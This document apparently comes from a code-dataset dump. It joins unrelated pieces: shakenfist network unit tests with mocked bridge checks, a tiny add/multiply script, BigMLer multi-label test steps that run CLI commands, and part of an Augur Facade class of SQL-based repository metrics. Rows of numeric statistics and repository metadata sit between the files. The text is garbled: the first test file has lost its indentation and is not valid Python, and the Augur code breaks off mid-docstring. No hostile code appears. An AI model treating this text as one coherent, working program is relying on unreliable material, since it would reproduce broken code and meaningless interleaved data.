@mock.patch('shakenfist.net.Network.is_created', return_value=False)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_not_created(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
def test_is_okay_no_masq(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': False,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
def test_is_okay_no_masq_no_dhcp(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': False,
'provide_nat': False,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
#
# is_created()
#
@mock.patch('shakenfist.util.process.execute',
return_value=(
"""[ {},{
"ifindex": 1,
"ifname": "br-vxlan-5",
"flags": [ "BROADCAST","MULTICAST","UP","LOWER_UP" ],
"mtu": 1500,
"qdisc": "noqueue",
"operstate": "UP",
"group": "default",
"txqlen": 1000,
"link_type": "ether",
"address": "1a:46:97:a1:c2:3a",
"broadcast": "ff:ff:ff:ff:ff:ff"
},{},{},{} ]""", ''))
def test_is_created_yes(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_created())
@mock.patch('shakenfist.util.process.execute',
return_value=("""[ {},{
"ifindex": 1,
"ifname": "br-vxlan-5",
"flags": [ "BROADCAST","MULTICAST","DOWN","LOWER_UP" ],
"mtu": 1500,
"qdisc": "noqueue",
"operstate": "UP",
"group": "default",
"txqlen": 1000,
"link_type": "ether",
"address": "1a:46:97:a1:c2:3a",
"broadcast": "ff:ff:ff:ff:ff:ff"
},{},{},{} ]""", ''))
def test_is_created_no(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 1,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_created())
@mock.patch('shakenfist.util.process.execute',
return_value=('', "Device 'br-vxlan-45' does not exist."))
def test_is_created_no_bridge(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_created())
@mock.patch('shakenfist.db.get_lock')
@mock.patch('shakenfist.net.Network._db_get_attribute',
side_effect=[
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_ERROR, 'update_time': 0},
{'value': dbo.STATE_DELETED, 'update_time': 0},
{'value': dbo.STATE_DELETED, 'update_time': 0},
])
@mock.patch('shakenfist.net.Network._db_set_attribute')
@mock.patch('shakenfist.etcd.put')
def test_set_state_valid(
self, mock_put, mock_attribute_set, mock_state_get, mock_lock):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
with testtools.ExpectedException(exceptions.InvalidStateException):
n.state = net.Network.STATE_INITIAL
n.state = dbo.STATE_ERROR
n.state = dbo.STATE_DELETED
with testtools.ExpectedException(exceptions.InvalidStateException):
n.state = dbo.STATE_CREATED
| 36.012618
| 80
| 0.542835
| 1,233
| 11,416
| 4.811841
| 0.117599
| 0.050565
| 0.086466
| 0.070453
| 0.809034
| 0.764369
| 0.753919
| 0.727625
| 0.722737
| 0.722737
| 0
| 0.043957
| 0.308514
| 11,416
| 316
| 81
| 36.126582
| 0.707626
| 0.002891
| 0
| 0.720149
| 0
| 0
| 0.286949
| 0.096105
| 0
| 0
| 0
| 0
| 0.041045
| 1
| 0.059701
| false
| 0
| 0.026119
| 0
| 0.100746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
133aeae93151413157245283ef01c5da29120a33
| 102
|
py
|
Python
|
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
pranavmodx/aiida-core
|
0edbbf82dfb97ab130914d1674a6f2217eba5971
|
[
"BSD-2-Clause",
"MIT"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
odarbelaeze/aiida_core
|
934b4ccdc73a993f2a6656caf516500470e3da08
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
odarbelaeze/aiida_core
|
934b4ccdc73a993f2a6656caf516500470e3da08
|
[
"BSD-2-Clause"
] | null | null | null |
def add(x, y):
return x + y
def multiply(x, y):
return x * y
result = multiply(add(1, 2), 3)
| 14.571429
| 31
| 0.558824
| 20
| 102
| 2.85
| 0.5
| 0.140351
| 0.280702
| 0.315789
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 0.27451
| 102
| 7
| 31
| 14.571429
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.4
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1367e315e4c1d588da88c6cb8f2d19fb8f52a76e
| 14,420
|
py
|
Python
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 32
|
2015-01-12T10:11:42.000Z
|
2021-11-14T19:45:14.000Z
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 42
|
2015-02-12T09:54:11.000Z
|
2022-03-31T11:33:39.000Z
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 23
|
2015-03-04T13:25:23.000Z
|
2020-07-15T18:25:52.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2014-2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import time
import csv
import json
from bigmler.tests.world import world, res_filename
from subprocess import check_call, CalledProcessError
from bigmler.checkpoint import file_number_of_lines
from bigmler.tests.common_steps import check_debug
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator and "(.*)" as multi-label fields using model_fields "(.*)" and objective "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_create_all_mlm_resources(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, ml_fields=None, model_fields=None, objective=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None or model_fields is None or objective is None or ml_fields is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --multi-label-fields " + ml_fields +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --model-fields \" " + model_fields +
"\" --test " + test + " --store --output " + output +
" --objective " + objective +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator to test "(.*)" and log predictions in "(.*)"')
def i_create_all_ml_resources(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --test " + test + " --store --output " + output +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag(step, tag=None, test=None, output=None):
if tag is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --test " +
test + " --store --output " + output +
" --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources with labels "(.*)" and objective "(.*)" using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag_with_labels_with_objective(step, labels=None, objective=None, tag=None, test=None, output=None):
if (tag is None or labels is None or test is None or output is None
or objective is None):
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --labels " +
labels + " --test " + test + " --store --output " + output +
" --objective " + objective + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources with labels "([^"]*)" using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag_with_labels(step, labels=None, tag=None, test=None, output=None):
if tag is None or labels is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --labels " +
labels + " --test " + test + " --store --output " + output +
" --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'Then I check the extended file "(.*)" has been created')
def i_check_local_file(step, path=None):
if path is None:
assert False
try:
handler = open(path, "r")
world.headers = handler.readline().strip()
world.first_row = handler.readline().strip()
except IOError:
assert False
#@step(r'the headers of the local extended file are "(.*)"')
def i_check_headers_file(step, headers=None):
if headers is None:
assert False
if headers==world.headers:
assert True
else:
assert False, ("The expected headers are:\n%s\nand the"
" ones found are:\n%s" % (headers, world.headers))
#@step(r'the first row of the local extended file is "(.*)"')
def i_check_first_row_file(step, first_row=None):
if first_row is None:
assert False
if first_row==world.first_row:
assert True
else:
assert False, ("The expected first row is:\n%s\n"
"and the one found is:\n%s" % (first_row,
world.first_row))
#@step(r'I create BigML a multi-label source with "(.*)" label separator and (\d+) labels from train "(.*)" file with "(.*)" field separator and "(.*)" as multi-label fields and objective "(.*)" and output in "(.*)"')
def i_create_ml_source(step, label_separator=None, number_of_labels=None, data=None, training_separator=None, multi_label_fields=None, objective=None, output_dir=None):
if label_separator is None or training_separator is None or number_of_labels is None or data is None or multi_label_fields is None or output_dir is None or objective is None:
assert False
world.directory = output_dir
world.folders.append(world.directory)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --multi-label-fields " + multi_label_fields +
" --objective " + objective + " --store --output-dir " +
output_dir +
" --no-dataset --no-model --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.output = output_dir
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_all_ml_resources_and_ensembles(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, number_of_models=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None or number_of_models is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels) * int(number_of_models)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --test " + test + " --number-of-models " +
str(number_of_models) + " --store --output " + output +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML (multi-label\s)?resources using source and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_resources_and_ensembles_from_source(step, multi_label=None, number_of_models=None, test=None, output=None):
if test is None or output is None or number_of_models is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
multi_label = "" if multi_label is None else " --multi-label "
test = res_filename(test)
try:
command = ("bigmler "+ multi_label +"--source " +
world.source['resource'] + " --number-of-models " +
str(number_of_models) + " --test " + test +
" --store --output " + output)
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML (multi-label\s)?resources using dataset and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_resources_and_ensembles_from_dataset(step, multi_label=None, number_of_models=None, test=None, output=None):
if test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
multi_label = "" if multi_label is None else " --multi-label "
test = res_filename(test)
try:
command = ("bigmler "+ multi_label +"--dataset " +
world.dataset['resource'] + " --number-of-models " +
str(number_of_models) + " --test " + test +
" --store --output " + output)
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
| 48.066667
| 290
| 0.620804
| 1,852
| 14,420
| 4.704104
| 0.094492
| 0.03719
| 0.036731
| 0.023416
| 0.811983
| 0.792126
| 0.786272
| 0.767447
| 0.760331
| 0.760331
| 0
| 0.003508
| 0.268516
| 14,420
| 299
| 291
| 48.227425
| 0.822431
| 0.199029
| 0
| 0.739669
| 0
| 0
| 0.088848
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.049587
| false
| 0
| 0.033058
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1396bebd1db58c077d1864585f8401f712788dc8
| 37,324
|
py
|
Python
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | 3
|
2019-03-15T20:37:37.000Z
|
2019-03-15T22:09:16.000Z
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | 4
|
2020-07-07T19:53:05.000Z
|
2022-01-22T04:33:12.000Z
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | null | null | null |
#SPDX-License-Identifier: MIT
"""
Data source that uses Facade's tables
"""
import base64
import pandas as pd
import sqlalchemy as s
from augur import logger
from augur.util import annotate
# end imports
# (don't remove the above line, it's for a script)
class Facade(object):
"""Queries Facade"""
def __init__(self, user, password, host, port, dbname, projects=None):
"""
Connect to the database
:param dbstr: The [database string](http://docs.sqlalchemy.org/en/latest/core/engines.html) to connect to the GHTorrent database
"""
self.DB_STR = 'mysql+pymysql://{}:{}@{}:{}/{}'.format(
user, password, host, port, dbname
)
logger.debug('Facade: Connecting to {}:{}/{} as {}'.format(host, port, dbname, user))
self.db = s.create_engine(self.DB_STR, poolclass=s.pool.NullPool)
self.projects = projects
#####################################
### DIVERSITY AND INCLUSION ###
#####################################
#####################################
### GROWTH, MATURITY, AND DECLINE ###
#####################################
#####################################
### RISK ###
#####################################
#####################################
### VALUE ###
#####################################
#####################################
### ACTIVITY ###
#####################################
#####################################
### EXPERIMENTAL ###
#####################################
@annotate(tag='downloaded-repos')
def downloaded_repos(self):
"""
Returns all repository names, URLs, and base64 URLs in the facade database
"""
downloadedReposSQL = s.sql.text("""
SELECT git AS url, status, projects.name as project_name
FROM repos
JOIN projects
ON repos.projects_id = projects.id
""")
results = pd.read_sql(downloadedReposSQL, self.db)
results['url'] = results['url'].apply(lambda datum: datum.split('//')[1])
if self.projects:
results = results[results.project_name.isin(self.projects)]
b64_urls = []
for i in results.index:
b64_urls.append(base64.b64encode((results.at[i, 'url']).encode()))
results['base64_url'] = b64_urls
return results
@annotate(tag='lines-changed-by-author')
def lines_changed_by_author(self, repo_url):
"""
Returns number of lines changed per author per day
:param repo_url: the repository's URL
"""
linesChangedByAuthorSQL = s.sql.text("""
SELECT author_email, author_date, author_affiliation as affiliation, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace
FROM analysis_data
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY repos_id, author_date, author_affiliation, author_email
ORDER BY author_date ASC;
""")
results = pd.read_sql(linesChangedByAuthorSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='lines-changed-by-week')
def lines_changed_by_week(self, repo_url):
"""
Returns lines changed of a sent repository per week
:param repo_url: the repository's URL
"""
linesChangedByWeekSQL = s.sql.text("""
SELECT date(author_date) as date, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace
FROM analysis_data
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY YEARWEEK(author_date)
ORDER BY YEARWEEK(author_date) ASC
""")
results = pd.read_sql(linesChangedByWeekSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='lines-changed-by-month')
def lines_changed_by_month(self, repo_url):
"""
Returns lines changed of a sent repository per month
:param repo_url: the repository's URL
"""
linesChangedByMonthSQL = s.sql.text("""
SELECT email as author_email, affiliation, month, year, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace FROM repo_monthly_cache
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY email, month, year
ORDER BY year, month, email ASC
""")
results = pd.read_sql(linesChangedByMonthSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='commits-by-week')
def commits_by_week(self, repo_url):
"""
Returns number of patches per commiter per week
:param repo_url: the repository's URL
"""
commitsByMonthSQL = s.sql.text("""
SELECT email AS author_email, affiliation, WEEK AS `week`, YEAR AS `year`, patches FROM repo_weekly_cache
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY email, WEEK, YEAR
ORDER BY YEAR, WEEK, email ASC
""")
results = pd.read_sql(commitsByMonthSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
# cd - code
# rg - repo group
# tp - time period (fixed time period)
# interval
# ranked - ordered top to bottom
# commits
# loc - lines of code
# rep - repo
# ua - unaffiliated
@annotate(tag='cd-rg-newrep-ranked-commits')
def cd_rg_newrep_ranked_commits(self, repo_url, calendar_year=None, repo_group=None):
"""
For each repository in a collection of repositories being managed, each REPO that first appears in the parameterized
calendar year (a new repo in that year),
show all commits for that year (total for year by repo).
Result ranked from highest number of commits to lowest by default.
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param repo_group: the group of repositories to analyze
"""
if calendar_year == None:
calendar_year = 2018
if repo_group == None:
repo_group = 'facade_project'
cdRgNewrepRankedCommitsSQL = None
if repo_group == 'facade_project':
cdRgNewrepRankedCommitsSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, repos.name
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
cdRgNewrepRankedCommitsSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, projects.name
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgNewrepRankedCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, "calendar_year": calendar_year})
return results
@annotate(tag='cd-rg-newrep-ranked-loc')
def cd_rg_newrep_ranked_loc(self, repo_url, calendar_year=None, repo_group=None):
"""
For each repository in a collection of repositories being managed, each REPO that first appears in the parameterized
calendar year (a new repo in that year),
show all lines of code for that year (total for year by repo). Result ranked from highest number of commits to lowest by default.
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param repo_group: the group of repositories to analyze
"""
if calendar_year == None:
calendar_year = 2018
if repo_group == None:
repo_group = 'facade_project'
cdRgNewrepRankedLocSQL = None
if repo_group == 'facade_project':
cdRgNewrepRankedLocSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, repos.name
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and YEAR(repos.added) = :calendar_year
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
cdRgNewrepRankedLocSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, projects.name
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgNewrepRankedLocSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, "calendar_year": calendar_year})
return results
@annotate(tag='cd-rg-tp-ranked-commits')
def cd_rg_tp_ranked_commits(self, repo_url, timeframe=None, repo_group=None):
"""
For each repository in a collection of repositories being managed, each REPO's total commits during the current Month,
Year or Week. Result ranked from highest number of commits to lowest by default.
:param repo_url: the repository's URL
:param timeframe: All, year, month, or week. Contribution data from the timeframe that the current date is within will be considered
:param repo_group: the group of repositories to analyze
"""
if repo_group == None:
repo_group = 'facade_project'
if timeframe == None:
timeframe = 'all'
cdRgTpRankedCommitsSQL = None
if repo_group == 'facade_project':
if timeframe == "all":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
LIMIT 1)
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
if timeframe == "all":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and YEAR(repos.added) = YEAR(CURDATE())
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = :repo_group
and repo_monthly_cache.repos_id = repos.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgTpRankedCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group})
return results
@annotate(tag='cd-rg-tp-ranked-loc')
def cd_rg_tp_ranked_loc(self, repo_url, timeframe=None, repo_group=None):
"""
For each repository in a collection of repositories being managed, each REPO's total commits during the current Month,
Year or Week. Result ranked from highest number of LOC to lowest by default.
:param repo_url: the repository's URL
